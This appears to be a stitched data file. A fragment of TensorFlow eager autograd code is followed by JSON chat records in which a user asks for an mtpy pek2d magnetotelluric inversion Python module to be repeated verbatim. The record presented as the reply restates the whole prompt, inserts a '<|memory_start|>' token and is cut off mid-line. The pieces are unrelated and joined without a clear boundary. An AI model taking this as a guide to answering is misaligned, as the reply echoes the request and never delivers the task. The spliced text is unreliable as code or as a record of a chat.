with context.device("cpu:0"):
shape = tensor.Tensor(shape, dtype=dtypes.int32)
return array_ops.fill(shape, tensor.Tensor(0, dtype=dtype))
def _ones(shape, dtype):
return array_ops.fill(tensor.Tensor(shape, dtype=dtypes.int32),
tensor.Tensor(1, dtype=dtype))
def _lazy_zero_tensor(zero):
return _zeros(zero.shape, zero.dtype)
tensor.LazyZero.tensor = _lazy_zero_tensor
def _lazy_zero_to_tensor(lazy_zero, dtype=None, name=None, as_ref=False):
del as_ref, name, dtype
return _zeros(lazy_zero.shape, lazy_zero.dtype)
tf_ops.register_tensor_conversion_function(tensor.LazyZero,
_lazy_zero_to_tensor)
def _indexed_slices_to_tensor(value):
"""Converts an IndexedSlices object `value` to a Tensor.
Args:
value: An ops.IndexedSlices object.
Returns:
A dense Tensor representing the values in the given IndexedSlices.
Raises:
ValueError: If the IndexedSlices does not have the same dtype.
"""
if value.dense_shape is None:
raise ValueError(
"Tensor conversion requested for IndexedSlices without dense_shape: %s"
% str(value))
return math_ops.unsorted_segment_sum(
value.values, value.indices, value.dense_shape[0])
class TensorVSpace(ag_core.VSpace):
"""VSpace for tf/tfe Tensors in autograd."""
def __init__(self, value):
if isinstance(value, tensor.IndexedSlices):
self.shape = tensor_shape.TensorShape(value.dense_shape.numpy())
self.dtype = value.values.dtype
else:
self.shape = value.shape
self.dtype = value.dtype
self.size = self.shape.num_elements()
# TODO(apassos) put gradients on the same device as ops.
def __eq__(self, other):
if isinstance(other, tape.NoneVSpace):
return True
if self.dtype == dtypes.resource or other.dtype == dtypes.resource:
return True
return (type(self) == type(other) # pylint: disable=unidiomatic-typecheck
and self.dtype == other.dtype)
def __ne__(self, other):
return not self.__eq__(other)
def zeros(self):
return tensor.LazyZero(self.shape, self.dtype)
def ones(self):
return _ones(self.shape, self.dtype)
def standard_basis(self):
raise NotImplementedError
def flatten(self, value):
return array_ops.reshape(value, tensor.Tensor(-1))
def unflatten(self, value):
return array_ops.reshape(value, tensor.Tensor(self.shape))
def mut_add(self, x, y):
"""Add wrapper safe for IndexedSlices and LazyZero."""
if isinstance(ag_core.getval(x), tensor.LazyZero):
return y
if isinstance(ag_core.getval(y), tensor.LazyZero):
return x
if isinstance(x, tensor.IndexedSlices):
x = _indexed_slices_to_tensor(x)
if isinstance(y, tensor.IndexedSlices):
y = _indexed_slices_to_tensor(y)
return math_ops.add(x, y)
ag_core.register_vspace(TensorVSpace, tensor.Tensor)
ag_core.register_vspace(TensorVSpace, tf_ops.Tensor)
ag_core.register_vspace(TensorVSpace, tensor.IndexedSlices)
ag_core.register_vspace(TensorVSpace, tensor.LazyZero)
ag_core.register_node(TensorNode, tensor.LazyZero)
def _node_to_tensor(value, dtype=None, name=None, as_ref=False):
del as_ref
return tf_ops.convert_to_tensor(value.value, dtype=dtype, name=name)
tf_ops.register_tensor_conversion_function(TensorNode, _node_to_tensor)
```
|
[
{
"content": "Repeat the code precisely as written (spacing intact):\n```python\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 28 14:06:45 2014\n\n@author: a1655681\n\"\"\"\nimport mtpy.modeling.occam2d as o2d\nimport mtpy.modeling.pek1dclasses as p1dc\nimport numpy as np\nimport os\nimport os.path as op\nimport pek2dforward as p2d\nimport string\nimport scipy.interpolate as si\nimport mtpy.utils.filehandling as fh\nimport mtpy.core.edi as mtedi\nimport mtpy.modeling.pek2dforward as p2d\n\n\n\nclass Model():\n \"\"\"\n class for creating and reading model files\n \n \"\"\"\n \n \n def __init__(self, working_directory, **input_parameters):\n self.working_directory = working_directory\n self.edi_directory = None\n self.occam_configfile = None\n \n self.parameters_ctl = {}\n self.parameters_ctl['ctl_string'] = 'TAB'\n self.parameters_ctl['units_string'] = 'PR'\n self.parameters_ctl['quadrants'] = '++--'\n self.parameters_ctl['orientation_string'] = '0 0.d0 0.d0'\n self.parameters_ctl['convergence_string'] = '1 6 1.d-4'\n self.parameters_ctl['roughness_string'] = '2 1000.0d0 1000.0d0 0.d0'\n self.parameters_ctl['anisotropy_penalty_string'] = '2 1000.d0 0.d0'\n self.parameters_ctl['anisotropy_ctl_string'] = '1.d0 1.d0 1.d0'\n\n\n self.parameters_model = {}\n self.parameters_model['no_sideblockelements'] = 5\n self.parameters_model['no_bottomlayerelements'] = 4\n self.parameters_model['firstlayer_thickness'] = 100\n \n #model depth is in km!\n self.parameters_model['model_depth'] = 100\n self.parameters_model['no_layers'] = 25\n self.parameters_model['max_blockwidth'] = 1000\n self.parameters_data = {}\n self.parameters_data['strike'] = 0.\n self.parameters_data['errorfloor'] = dict(z=np.array([[0.05,0.05],\n [0.05,0.05]]),\n tipper=np.array([0.02,0.02]))\n self.parameters_data['errorfloor_type'] = 'offdiagonals'# offdiagonals or relative \n self.parameters_data['max_no_frequencies'] = 50\n self.parameters_data['mode'] = [1,1,1,1,1,1]\n self.n_airlayers = 5\n\n self.mesh = None\n self.meshlocations_x = None\n self.meshlocations_z = None\n self.meshblockwidths_x = None\n self.meshblockthicknesses_z = None\n self.profile_easts = None\n self.profile_norths = None\n self.inversion1d_dirdict = {}\n self.inversion1d_masterdir = '.'\n self.inversion1d_modelno = 0\n self.inversion1d_imethod = 'nearest'\n self.idir_basename = 'aniso'\n self.binsize_resistivitylog10 = 1.\n self.binsize_strike = 20.\n self.build_from_1d = False\n self.rotation = 0.\n self.modelfile = 'model.dat'\n self.anisotropy_min_depth = 0.\n self.strike = 0.\n\n self.edifiles = []\n\n self.Data = None\n\n self.modelfile = 'model'\n self.resfile = 'pb.res'\n self.cvgfile = 'pb.cvg'\n self.outfile = 'pb.out'\n self.pexfile = 'pb.pex'\n self.andfile = 'pb.and'\n self.exlfile = 'pb.exl' \n\n update_dict = {}\n\n #correcting dictionary for upper case keys\n input_parameters_nocase = {}\n for key in input_parameters.keys():\n input_parameters_nocase[key.lower()] = input_parameters[key]\n\n update_dict.update(input_parameters_nocase)\n\n for dictionary in [self.parameters_model,self.parameters_data]:\n for key in dictionary.keys():\n if key in update_dict:\n #check if entry exists:\n try:\n value = float(update_dict[key])\n dictionary[key] = value\n except:\n value = update_dict[key]\n dictionary[key] = value\n if type(value) in [str]:\n if value.strip().lower()=='none':\n dictionary[key] = None\n \n for key in update_dict:\n try: \n value = getattr(self,key)\n if update_dict[key] is not None:\n try:\n value = float(update_dict[key])\n setattr(self,key,value)\n except:\n value = update_dict[key]\n setattr(self,key,value)\n if type(value) in [str]:\n if value.strip().lower()=='none':\n setattr(self,key,None)\n except:\n continue\n\n self.input_parameters = update_dict\n print self.idir_basename\n if self.edifiles == []:\n if self.edi_directory is not None:\n try:\n self.edifiles = [op.join(self.edi_directory,\n f) for f in os.listdir(self.edi_directory)]\n except IOError:\n print(\"failed to find edi directory\")\n pass\n \n def build_inputfiles(self):\n inversiondir = fh.make_unique_folder(self.working_directory,basename=self.idir_basename)\n os.mkdir(op.join(self.working_directory,inversiondir))\n self.working_directory = inversiondir\n self.build_model()\n self.write_modelfile()\n self.write_datafiles()\n self.write_ctlfile()\n \n def read_model(self):\n \"\"\"\n use pek2d forward python setup code to read the model\n \"\"\"\n model = p2d.Model(working_directory = self.working_directory,\n **self.input_parameters)\n model.read_model()\n for attr in ['meshblockwidths_x', 'meshblockthicknesses_z', \n 'meshlocations_x', 'meshlocations_z', \n 'modelblocknums', 'resistivity', 'sds', \n 'station_indices','modelfile_reslines',\n 'n_airlayers']:\n try:\n setattr(self,attr,getattr(model,attr))\n except:\n print \"can't assign attribute {}\".format(attr)\n \n def read_outfile(self,chunk=1750,linelength=52):\n \"\"\"\n read the outfile from the reverse end and get out last iteration\n \"\"\"\n # open outfile\n outfile = open(op.join(self.working_directory,self.outfile))\n \n if not hasattr(self,'modelblocknums'):\n self.read_model()\n elif self.modelblocknums is None:\n self.read_model()\n mb = np.sum(self.modelfile_reslines[:,-6:].astype(int))\n\n\n # read backwards from end of file, in chunks of 175, until a 4-column row is found\n nn = 1\n while True:\n try:\n outfile.seek(-nn, 2)\n outfile.readline()\n line = outfile.readline().strip().split()\n n = outfile.tell()\n if len(line) == 4:\n break\n nn += chunk\n except:\n print \"invalid outfile, cannot read resistivity values from outfile yet\"\n return\n m = 0\n while line[0] != '1':\n outfile.seek(n-linelength*m)\n line = outfile.readline().strip().split()\n m += 1\n \n self.outfile_reslines = np.zeros([mb,4])\n \n for m in range(mb):\n self.outfile_reslines[m] = [float(ll) for ll in line]\n line = outfile.readline().strip().split()\n \n # iterate through resistivity and assign new values if they have been inverted for\n n = 0\n nair = self.n_airlayers + 1\n nx,nz = len(self.meshlocations_x), len(self.meshlocations_z)\n for i in range(nz - nair):\n for j in range(nx - 1):\n for k in range(6):\n mfi = (nx - 1)*i + j + 1\n if self.modelfile_reslines[mfi,k+8] == '1':\n if k < 3:\n self.resistivity[i+nair-1,j,k] = self.outfile_reslines[n,2]\n else:\n self.sds[i+nair-1,j,k-3] = self.outfile_reslines[n,2]\n n += 1\n# print i,j,k,n\n \n \n def build_model(self):\n \"\"\"\n build model file string\n \"\"\"\n # build a forward model object\n ro = p2d.Model(self.working_directory,**self.input_parameters)\n ro.build_model()\n\n\n # assign relavent parameters to pek 2d inverse object\n for at in ['stationlocations','parameters_model',\n 'meshlocations_x','meshlocations_z',\n 'meshblockwidths_x','meshblockthicknesses_z',\n 'profile_easts','profile_norths','Data',\n 'meshblockthicknesses_zair','meshlocations_zair']:\n attvalue = getattr(ro,at)\n setattr(self,at,attvalue)\n\n\n ro.get_station_meshblock_numbers()\n if ro.build_from_1d:\n# try:\n ro.get_1d_results()\n ro.interpolate_1d_results()\n for at in ['inversion1d_dirdict','inversion1d_modelno',\n 'models1d','resistivity','stationlocations',\n 'blockcentres_x','blockcentres_z']:\n attvalue = getattr(ro,at)\n setattr(self,at,attvalue)\n# except:\n else:\n for at in ['resistivity','stationlocations',\n 'blockcentres_x','blockcentres_z']:\n setattr(self,at,getattr(ro,at))\n for at in ['inversion1d_dirdict','inversion1d_modelno',\n 'models1d']:\n setattr(self,at,None)\n\n ro.get_station_meshblock_numbers()\n self.stationblocknums=ro.stationblocknums\n \n self.build_modelfilestring()\n \n \n def write_modelfile(self):\n \n if not hasattr(self,'modelfilestring'):\n self.build_model()\n outfile = open(op.join(self.working_directory,\n self.modelfile),'w')\n outfile.write(self.modelfilestring)\n outfile.close()\n\n \n \n def build_modelfilestring(self): \n # initialise a list containing info for model file\n modelfilestring = []\n # add header info\n modelfilestring.append('NEW')\n modelfilestring.append(' 1')\n modelfilestring.append(' 1.000') \n\n # add string giving number of cells:\n modelfilestring.append(''.join(['%5i'%i for i in [len(self.meshlocations_x),\n len(self.meshlocations_z)+self.n_airlayers,\n self.n_airlayers+1]]))\n\n # add strings giving horizontal and vertical mesh steps\n meshz = list(self.meshblockthicknesses_zair)+list(self.meshblockthicknesses_z)\n for meshstep in [self.meshblockwidths_x,meshz]:\n modelfilestring.append\\\n (p2d.create_multiple_line_string(meshstep,\n 10,'%10.3f'))\n\n \n # add resistivity map\n rmap = ('%5i'%0*len(self.resistivity[0])+'\\n')*self.n_airlayers\n rmap += '\\n'.join([''.join('%5i'%ii for ii in i) for i in \\\n np.arange(1,np.size(self.resistivity[:,:,0])+1).reshape(np.shape(self.resistivity)[:2])])\n modelfilestring.append(rmap)\n \n # add number of resistivity domains (+1 to include air)\n modelfilestring.append('%5i'%(np.size(self.resistivity[:,:,0])+1))\n \n # add dictionary contents, assuming rvertical = rmax, slant and dip zero\n # first, air layer, properties always the same\n modelfilestring.append(' 0 0 -1.00 0.00 0.00 0.00 0.00 0.00 0 0 0 0 0 0')\n # second, dictionary contents\n no = 1\n for j in range(len(self.resistivity)):\n for i in range(len(self.resistivity[j])):\n # initialise a list containing resx,resy,strike\n rlist = list(self.resistivity[j,i])\n # insert resz (assumed to be same as resy)\n rlist.insert(2,rlist[1])\n # insert dip and slant (assumed zero)\n rlist += [0.,0.]\n# if rlist[1]/rlist[0] == 1.:\n# aniso = ' 0'\n# invert_key = ' 1 1 1 0 0 0'\n# else:\n aniso = ' 1'\n invert_key = ' 1 1 1 1 1 0'\n modelfilestring.append(''.join(['%5i'%no,aniso]+['%10.2f'%i for i in rlist]+[invert_key]))\n no += 1\n # append bathymetry index, at this stage only 0 allowed:\n modelfilestring.append('%5i'%0)\n \n # append number of calculation points (stations):\n modelfilestring.append('%5i'%len(self.stationblocknums))\n \n # append rotation\n modelfilestring.append('%10.2f'%self.rotation)\n \n # append station blocknums\n modelfilestring.append(p2d.create_multiple_line_string(self.stationblocknums,\n 5,' %03i'))\n \n modelfilestring.append('%5i'%0)\n self.modelfilestring = '\\n'.join(modelfilestring)+'\\n'\n\n\n def build_data(self):\n\n imethod = 'nearest'\n ftol = 0.000001\n \n num_freq = int(self.parameters_data['max_no_frequencies'])\n\n # get minimum and maximum periods\n min_val = max([min(1./zo.freq) for zo in self.Data.Z])\n max_val = min([max(1./zo.freq) for zo in self.Data.Z])\n \n \n periodlst = []\n \n for period in 1./self.Data.frequencies:\n if len(periodlst) > 0:\n # find the difference between the period and the closest period already in the list\n closest_period_diff = np.amin(np.abs(np.array(periodlst)-period))\n else:\n # otherwise set period difference to a large number\n closest_period_diff = 99999\n\n # check whether the fractional difference is bigger than the tolerance set\n# print closest_period_diff,closest_period_diff/period,\n if closest_period_diff/period > ftol:\n if min_val <= period <= max_val:\n periodlst.append(period)\n periodlst.sort()\n# print periodlst\n # if number of periods still too long based on the number of frequencies set\n # then take out some frequencies\n n = 2\n new_periodlst = periodlst\n while len(new_periodlst) > num_freq:\n new_periodlst = [periodlst[int(p)] for p in range(len(periodlst)) if p%n == 0]\n n += 1\n periodlst = new_periodlst\n\n mode = self.parameters_data['mode']\n if type(mode) in [str]:\n mode = mode.split(',')\n self.parameters_data['mode'] = mode\n datafile_data = {}\n \n for ee,zo in enumerate(self.Data.Z):\n to=self.Data.Tipper[ee]\n datfn = str(self.stationblocknums[ee])+'_'+self.Data.stations[ee]+'.dat'\n\n\n zerr = zo.zerr\n z = zo.z\n ze_rel = zerr/np.abs(z)\n \n terr = to.tippererr\n t = to.tipper\n te_rel = terr/np.abs(t)\n \n # set error floors\n efz = self.parameters_data['errorfloor']['z']\n eft = self.parameters_data['errorfloor']['tipper']\n eftype = self.parameters_data['errorfloor_type']\n \n if eftype in ['relative','offdiagonals']:\n for i in range(2):\n for j in range(2):\n ze_rel[ze_rel<efz[i,j]] = efz[i,j]\n te_rel[te_rel<eft[i]] = eft[i]\n zerr = ze_rel * np.abs(z)\n terr = te_rel * np.abs(t)\n \n if eftype == 'offdiagonals':\n for i in range(2):\n for iz in range(len(z)):\n if zerr[iz,i,i] < zerr[iz,i,1-i]:\n zerr[iz,i,i] = zerr[iz,i,1-i]\n \n zvar = zerr**2\n \n \n # create interpolation functions to interpolate z and tipper values\n properties = dict(z_real=np.real(z),z_imag=np.imag(z),\n z_var=zvar,tipper_real=np.real(t),\n tipper_imag=np.imag(t),tipper_err=terr)\n properties_interp = {}\n for key in properties.keys():\n f = si.interp1d(np.log10(1./zo.freq),properties[key],\n axis = 0,kind = imethod)\n properties_interp[key] = f(np.log10(periodlst))\n\n datafile_data[datfn] = properties_interp\n \n \n self.datafile_data = datafile_data\n self.freq = 1./(np.array(periodlst))\n \n def build_datafiles(self):\n \n if not hasattr(self,'datafile_data'):\n self.build_data()\n dfstrings = {}\n \n for dfile in self.datafile_data.keys():\n datfstr = '{:<3} '.format(len(self.freq))+\\\n ' '.join([str(i) for i in self.parameters_data['mode']])+'\\n'\n for pv in range(len(self.freq)):\n datlst = '{0:>12}'.format('%.06f'%(1./(self.freq[pv])))\n for ii in range(2):\n for jj in range(2):\n for pval in ['z_real', 'z_imag', 'z_var']:\n# print self.datafile_data[dfile][pval][pv][ii,jj]\n datlst += '{0:>12}'.format('%.06f'%self.datafile_data[dfile][pval][pv][ii,jj])\n for ii in range(2):\n for pval in ['tipper_real', 'tipper_imag', 'tipper_err']:\n datlst += '{0:>12}'.format('%.06f'%self.datafile_data[dfile][pval][pv][0,ii])\n\n datfstr += ''.join(datlst)+'\\n'\n dfstrings[dfile] = datfstr\n \n self.datafile_strings = dfstrings\n\n def write_datafiles(self):\n \n if not hasattr(self,'datafile_strings'):\n self.build_datafiles()\n \n exlf = open(os.path.join(self.working_directory,self.working_directory,self.exlfile),'w')\n dfkeys=self.datafile_strings.keys()\n dfkeys.sort()\n for dfile in dfkeys:\n f = open(op.join(self.working_directory,self.working_directory,dfile),'w')\n f.write(self.datafile_strings[dfile])\n f.close()\n exlf.write(dfile+'\\n')\n exlf.close()\n\n def write_ctlfile(self):\n ctrf = open(op.join(self.working_directory,self.working_directory,'pb.ctr'),'w')\n \n if type(self.parameters_data['mode']) == str:\n self.parameters_data['mode'] = self.parameters_data['mode'].split(',')\n ef = np.hstack([self.parameters_data['errorfloor'][l].flatten() for l in ['z','tipper']])\n\n \n clist = []\n clist.append(self.exlfile)\n clist.append(self.parameters_ctl['ctl_string']+self.parameters_ctl['units_string']+self.parameters_ctl['quadrants'])\n clist.append(' '.join([str(i) for i in self.parameters_data['mode']]))\n clist.append(' '.join(['0.00' for i in ef]))\n clist.append(self.parameters_ctl['orientation_string'])\n clist.append(self.modelfile)\n clist.append(self.resfile)\n clist.append(self.parameters_ctl['convergence_string'])\n clist.append(self.parameters_ctl['roughness_string'])\n clist.append(self.parameters_ctl['anisotropy_penalty_string'])\n clist.append(self.parameters_ctl['anisotropy_ctl_string'])\n clist.append(self.cvgfile)\n clist.append(self.outfile)\n clist.append(self.pexfile)\n clist.append(self.andfile) \n \n self.controlfile_string = '\\n'.join(clist)\n ctrf.write(self.controlfile_string)\n\n ctrf.close()\n```",
"role": "user"
}
] |
[
{
"content": "Repeat the code precisely as written (spacing intact):\n<|memory_start|>```python\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 28 14:06:45 2014\n\n@author: a1655681\n\"\"\"\nimport mtpy.modeling.occam2d as o2d\nimport mtpy.modeling.pek1dclasses as p1dc\nimport numpy as np\nimport os\nimport os.path as op\nimport pek2dforward as p2d\nimport string\nimport scipy.interpolate as si\nimport mtpy.utils.filehandling as fh\nimport mtpy.core.edi as mtedi\nimport mtpy.modeling.pek2dforward as p2d\n\n\n\nclass Model():\n \"\"\"\n class for creating and reading model files\n \n \"\"\"\n \n \n def __init__(self, working_directory, **input_parameters):\n self.working_directory = working_directory\n self.edi_directory = None\n self.occam_configfile = None\n \n self.parameters_ctl = {}\n self.parameters_ctl['ctl_string'] = 'TAB'\n self.parameters_ctl['units_string'] = 'PR'\n self.parameters_ctl['quadrants'] = '++--'\n self.parameters_ctl['orientation_string'] = '0 0.d0 0.d0'\n self.parameters_ctl['convergence_string'] = '1 6 1.d-4'\n self.parameters_ctl['roughness_string'] = '2 1000.0d0 1000.0d0 0.d0'\n self.parameters_ctl['anisotropy_penalty_string'] = '2 1000.d0 0.d0'\n self.parameters_ctl['anisotropy_ctl_string'] = '1.d0 1.d0 1.d0'\n\n\n self.parameters_model = {}\n self.parameters_model['no_sideblockelements'] = 5\n self.parameters_model['no_bottomlayerelements'] = 4\n self.parameters_model['firstlayer_thickness'] = 100\n \n #model depth is in km!\n self.parameters_model['model_depth'] = 100\n self.parameters_model['no_layers'] = 25\n self.parameters_model['max_blockwidth'] = 1000\n self.parameters_data = {}\n self.parameters_data['strike'] = 0.\n self.parameters_data['errorfloor'] = dict(z=np.array([[0.05,0.05],\n [0.05,0.05]]),\n tipper=np.array([0.02,0.02]))\n self.parameters_data['errorfloor_type'] = 'offdiagonals'# offdiagonals or relative \n self.parameters_data['max_no_frequencies'] = 50\n self.parameters_data['mode'] = [1,1,1,1,1,1]\n self.n_airlayers = 5\n\n self.mesh = None\n self.meshlocations_x = None\n self.meshlocations_z = None\n self.meshblockwidths_x = None\n self.meshblockthicknesses_z = None\n self.profile_easts = None\n self.profile_norths = None\n self.inversion1d_dirdict = {}\n self.inversion1d_masterdir = '.'\n self.inversion1d_modelno = 0\n self.inversion1d_imethod = 'nearest'\n self.idir_basename = 'aniso'\n self.binsize_resistivitylog10 = 1.\n self.binsize_strike = 20.\n self.build_from_1d = False\n self.rotation = 0.\n self.modelfile = 'model.dat'\n self.anisotropy_min_depth = 0.\n self.strike = 0.\n\n self.edifiles = []\n\n self.Data = None\n\n self.modelfile = 'model'\n self.resfile = 'pb.res'\n self.cvgfile = 'pb.cvg'\n self.outfile = 'pb.out'\n self.pexfile = 'pb.pex'\n self.andfile = 'pb.and'\n self.exlfile = 'pb.exl' \n\n update_dict = {}\n\n #correcting dictionary for upper case keys\n input_parameters_nocase = {}\n for key in input_parameters.keys():\n input_parameters_nocase[key.lower()] = input_parameters[key]\n\n update_dict.update(input_parameters_nocase)\n\n for dictionary in [self.parameters_model,self.parameters_data]:\n for key in dictionary.keys():\n if key in update_dict:\n #check if entry exists:\n try:\n value = float(update_dict[key])\n dictionary[key] = value\n except:\n value = update_dict[key]\n dictionary[key] = value\n if type(value) in [str]:\n if value.strip().lower()=='none':\n dictionary[key] = None\n \n for key in update_dict:\n try: \n value = getattr(self,key)\n if update_dict[key] is not None:\n try:\n value = float(update_dict[key])\n setattr(self,key,value)\n except:\n value = update_dict[key]\n setattr(self,key,value)\n if type(value) in [str]:\n if value.strip().lower()=='none':\n setattr(self,key,None)\n except:\n continue\n\n self.input_parameters = update_dict\n print self.idir_basename\n if self.edifiles == []:\n if self.edi_directory is not None:\n try:\n self.edifiles = [op.join(self.edi_directory,\n f) for f in os.listdir(self.edi_directory)]\n except IOError:\n print(\"failed to find edi directory\")\n pass\n \n def build_inputfiles(self):\n inversiondir = fh.make_unique_folder(self.working_directory,basename=self.idir_basename)\n os.mkdir(op.join(self.working_directory,inversiondir))\n self.working_directory = inversiondir\n self.build_model()\n self.write_modelfile()\n self.write_datafiles()\n self.write_ctlfile()\n \n def read_model(self):\n \"\"\"\n use pek2d forward python setup code to read the model\n \"\"\"\n model = p2d.Model(working_directory = self.working_directory,\n **self.input_parameters)\n model.read_model()\n for attr in ['meshblockwidths_x', 'meshblockthicknesses_z', \n 'meshlocations_x', 'meshlocations_z', \n 'modelblocknums', 'resistivity', 'sds', \n 'station_indices','modelfile_reslines',\n 'n_airlayers']:\n try:\n setattr(self,attr,getattr(model,attr))\n except:\n print \"can't assign attribute {}\".format(attr)\n \n def read_outfile(self,chunk=1750,linelength=52):\n \"\"\"\n read the outfile from the reverse end and get out last iteration\n \"\"\"\n # open outfile\n outfile = open(op.join(self.working_directory,self.outfile))\n \n if not hasattr(self,'modelblocknums'):\n self.read_model()\n elif self.modelblocknums is None:\n self.read_model()\n mb = np.sum(self.modelfile_reslines[:,-6:].astype(int))\n\n\n # read backwards from end of file, in chunks of 175, until a 4-column row is found\n nn = 1\n while True:\n try:\n outfile.seek(-nn, 2)\n outfile.readline()\n line = outfile.readline().strip().split()\n n = outfile.tell()\n if len(line) == 4:\n break\n nn += chunk\n except:\n print \"invalid outfile, cannot read resistivity values from outfile yet\"\n return\n m = 0\n while line[0] != '1':\n outfile.seek(n-linelength*m)\n line = outfile.readline().strip().split()\n m += 1\n \n self.outfile_reslines = np.zeros([mb,4])\n \n for m in range(mb):\n self.outfile_reslines[m] = [float(ll) for ll in line]\n line = outfile.readline().strip().split()\n \n # iterate through resistivity and assign new values if they have been inverted for\n n = 0\n nair = self.n_airlayers + 1\n nx,nz = len(self.meshlocations_x), len(self.meshlocations_z)\n for i in range(nz - nair):\n for j in range(nx - 1):\n for k in range(6):\n mfi = (nx - 1)*i + j + 1\n if self.modelfile_reslines[mfi,k+8] == '1':\n if k < 3:\n self.resistivity[i+nair-1,j,k] = self.outfile_reslines[n,2]\n else:\n self.sds[i+nair-1,j,k-3] = self.outfile_reslines[n,2]\n n += 1\n# print i,j,k,n\n \n \n def build_model(self):\n \"\"\"\n build model file string\n \"\"\"\n # build a forward model object\n ro = p2d.Model(self.working_directory,**self.input_parameters)\n ro.build_model()\n\n\n # assign relavent parameters to pek 2d inverse object\n for at in ['stationlocations','parameters_model',\n 'meshlocations_x','meshlocations_z',\n 'meshblockwidths_x','meshblockthicknesses_z',\n 'profile_easts','profile_norths','Data',\n 'meshblockthicknesses_zair','meshlocations_zair']:\n attvalue = getattr(ro,at)\n setattr(self,at,attvalue)\n\n\n ro.get_station_meshblock_numbers()\n if ro.build_from_1d:\n# try:\n ro.get_1d_results()\n ro.interpolate_1d_results()\n for at in ['inversion1d_dirdict','inversion1d_modelno',\n 'models1d','resistivity','stationlocations',\n 'blockcentres_x','blockcentres_z']:\n attvalue = getattr(ro,at)\n setattr(self,at,attvalue)\n# except:\n else:\n for at in ['resistivity','stationlocations',\n 'blockcentres_x','blockcentres_z']:\n setattr(self,at,getattr(ro,at))\n for at in ['inversion1d_dirdict','inversion1d_modelno',\n 'models1d']:\n setattr(self,at,None)\n\n ro.get_station_meshblock_numbers()\n self.stationblocknums=ro.stationblocknums\n \n self.build_modelfilestring()\n \n \n def write_modelfile(self):\n \n if not hasattr(self,'modelfilestring'):\n self.build_model()\n outfile = open(op.join(self.working_directory,\n self.modelfile),'w')\n outfile.write(self.modelfilestring)\n outfile.close()\n\n \n \n def build_modelfilestring(self): \n # initialise a list containing info for model file\n modelfilestring = []\n # add header info\n modelfilestring.append('NEW')\n modelfilestring.append(' 1')\n modelfilestring.append(' 1.000') \n\n # add string giving number of cells:\n modelfilestring.append(''.join(['%5i'%i for i in [len(self.meshlocations_x),\n len(self.meshlocations_z)+self.n_airlayers,\n self.n_airlayers+1]]))\n\n # add strings giving horizontal and vertical mesh steps\n meshz = list(self.meshblockthicknesses_zair)+list(self.meshblockthicknesses_z)\n for meshstep in [self.meshblockwidths_x,meshz]:\n modelfilestring.append\\\n (p2d.create_multiple_line_string(meshstep,\n 10,'%10.3f'))\n\n \n # add resistivity map\n rmap = ('%5i'%0*len(self.resistivity[0])+'\\n')*self.n_airlayers\n rmap += '\\n'.join([''.join('%5i'%ii for ii in i) for i in \\\n np.arange(1,np.size(self.resistivity[:,:,0])+1).reshape(np.shape(self.resistivity)[:2])])\n modelfilestring.append(rmap)\n \n # add number of resistivity domains (+1 to include air)\n modelfilestring.append('%5i'%(np.size(self.resistivity[:,:,0])+1))\n \n # add dictionary contents, assuming rvertical = rmax, slant and dip zero\n # first, air layer, properties always the same\n modelfilestring.append(' 0 0 -1.00 0.00 0.00 0.00 0.00 0.00 0 0 0 0 0 0')\n # second, dictionary contents\n no = 1\n for j in range(len(self.resistivity)):\n for i in range(len(self.resistivity[j])):\n # initialise a list containing resx,resy,strike\n rlist = list(self.resistivity[j,i])\n # insert resz (assumed to be same as resy)\n rlist.insert(2,rlist[1])\n # insert dip and slant (assumed zero)\n rlist += [0.,0.]\n# if rlist[1]/rlist[0] == 1.:\n# aniso = ' 0'\n# invert_key = ' 1 1 1 0 0 0'\n# else:\n aniso = ' 1'\n invert_key = ' 1 1 1 1 1 0'\n modelfilestring.append(''.join(['%5i'%no,aniso]+['%10.2f'%i for i in rlist]+[invert_key]))\n no += 1\n # append bathymetry index, at this stage only 0 allowed:\n modelfilestring.append('%5i'%0)\n \n # append number of calculation points (stations):\n modelfilestring.append('%5i'%len(self.stationblocknums))\n \n # append rotation\n modelfilestring.append('%10.2f'%self.rotation)\n \n # append station blocknums\n modelfilestring.append(p2d.create_multiple_line_string(self.stationblocknums,\n 5,' %03i'))\n \n modelfilestring.append('%5i'%0)\n self.modelfilestring = '\\n'.join(modelfilestring)+'\\n'\n\n\n def build_data(self):\n\n imethod = 'nearest'\n ftol = 0.000001\n \n num_freq = int(self.parameters_data['max_no_frequencies'])\n\n # get minimum and maximum periods\n min_val = max([min(1./zo.freq) for zo in self.Data.Z])\n max_val = min([max(1./zo.freq) for zo in self.Data.Z])\n \n \n periodlst = []\n \n for period in 1./self.Data.frequencies:\n if len(periodlst) > 0:\n # find the difference between the period and the closest period already in the list\n closest_period_diff = np.amin(np.abs(np.array(periodlst)-period))\n else:\n # otherwise set period difference to a large number\n closest_period_diff = 99999\n\n # check whether the fractional difference is bigger than the tolerance set\n# print closest_period_diff,closest_period_diff/period,\n if closest_period_diff/period > ftol:\n if min_val <= period <= max_val:\n periodlst.append(period)\n periodlst.sort()\n# print periodlst\n # if number of periods still too long based on the number of frequencies set\n # then take out some frequencies\n n = 2\n new_periodlst = periodlst\n while len(new_periodlst) > num_freq:\n new_periodlst = [periodlst[int(p)] for p in range(len(periodlst)) if p%n == 0]\n n += 1\n periodlst = new_periodlst\n\n mode = self.parameters_data['mode']\n if type(mode) in [str]:\n mode = mode.split(',')\n self.parameters_data['mode'] = mode\n datafile_data = {}\n \n for ee,zo in enumerate(self.Data.Z):\n to=self.Data.Tipper[ee]\n datfn = str(self.stationblocknums[ee])+'_'+self.Data.stations[ee]+'.dat'\n\n\n zerr = zo.zerr\n z = zo.z\n ze_rel = zerr/np.abs(z)\n \n terr = to.tippererr\n t = to.tipper\n te_rel = terr/np.abs(t)\n \n # set error floors\n efz = self.parameters_data['errorfloor']['z']\n eft = self.parameters_data['errorfloor']['tipper']\n eftype = self.parameters_data['errorfloor_type']\n \n if eftype in ['relative','offdiagonals']:\n for i in range(2):\n for j in range(2):\n ze_rel[ze_rel<efz[i,j]] = efz[i,j]\n te_rel[te_rel<eft[i]] = eft[i]\n zerr = ze_rel * np.abs(z)\n terr = te_rel * np.abs(t)\n \n if eftype == 'offdiagonals':\n for i in range(2):\n for iz in range(len(z)):\n if zerr[iz,i,i] < zerr[iz,i,1-i]:\n zerr[iz,i,i] = zerr[iz,i,1-i]\n \n zvar = zerr**2\n \n \n # create interpolation functions to interpolate z and tipper values\n properties = dict(z_real=np.real(z),z_imag=np.imag(z),\n z_var=zvar,tipper_real=np.real(t),\n tipper_imag=np.imag(t),tipper_err=terr)\n properties_interp 